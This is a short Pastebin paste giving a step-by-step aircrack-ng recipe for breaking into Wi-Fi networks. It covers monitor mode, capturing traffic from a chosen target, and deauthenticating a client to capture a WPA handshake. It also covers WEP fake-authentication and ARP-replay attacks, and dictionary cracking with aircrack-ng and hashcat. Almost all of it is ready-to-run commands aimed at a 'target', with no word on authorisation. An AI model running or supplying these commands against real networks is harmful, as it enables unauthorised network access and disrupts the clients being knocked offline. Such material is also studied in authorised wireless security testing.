Advertisement
Guest User

Untitled

a guest
Dec 9th, 2016
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.64 KB | None | 0 0
  1. # List Interfaces
  2. airmon-ng
  3. # Start Monitor
  4. airmon-ng start wlan0
  5. # Optional: Start Monitor in Channel Specific (9)
  6. airmon-ng start wlan0 9
  7.  
  8. # New device shows up in iwconfig, note it and use it
  9. iwconfig
  10.  
  11. # See surrounding wifi
  12. airodump-ng mon0
  13. # Find target with data and clients, note channel and both bssid/ssid, write to filename
  14. airodump-ng -c 9 --bssid 00:00:00:00:00:00 -w filename mon0
  15.  
  16. # For WPA, you will need to deauth a client and capture handshake
  17. # -a is bssid of router, -c is client/target
  18. aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 mon0
  19.  
  20. # Now crack it with a wordlist, -b is router bssid
  21. aircrack-ng -w password.lst -b 00:00:00:00:00:00 filename*.cap
  22.  
  23. # For WEP you need to test with:
  24. # -e is SSID name, -a is target BSSID
  25. aireplay-ng -9 -e targetSSID -a 00:14:6C:7E:40:80 mon9
  26. # output on last line should be 100% or really high
  27. # otherwise you are too far away
  28.  
  29. # Start Airodump like above
  30. airodump-ng -c 9 --bssid 00:00:00:00:00:00 -w filename mon0
  31.  
  32. # Start fake auth attack
  33. aireplay-ng -1 0 -e targetSSID -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
  34. # -a is target BSSID, -h is our mac
  35. # Variation if that doesn't work
  36. aireplay-ng -1 6000 -o 1 -q 10 -e targetSSID -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
  37.  
  38. # Replay the ARP request
  39. # -b is target BSSID, -h is our mac
  40. aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
  41. # And crack that ass, -b is target BSSID
  42. aircrack-ng -b 00:14:6C:7E:40:80 filename*.cap
  43.  
  44. # How to crack better:
  45. # cuda - nvidia
  46. # ocl - ati
  47. # hashcat - windows
  48. aircrack-ng filename.cap -J filename.hccap
  49. hashcat64.exe -m 2500 filename.hccap dictionary.lst
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement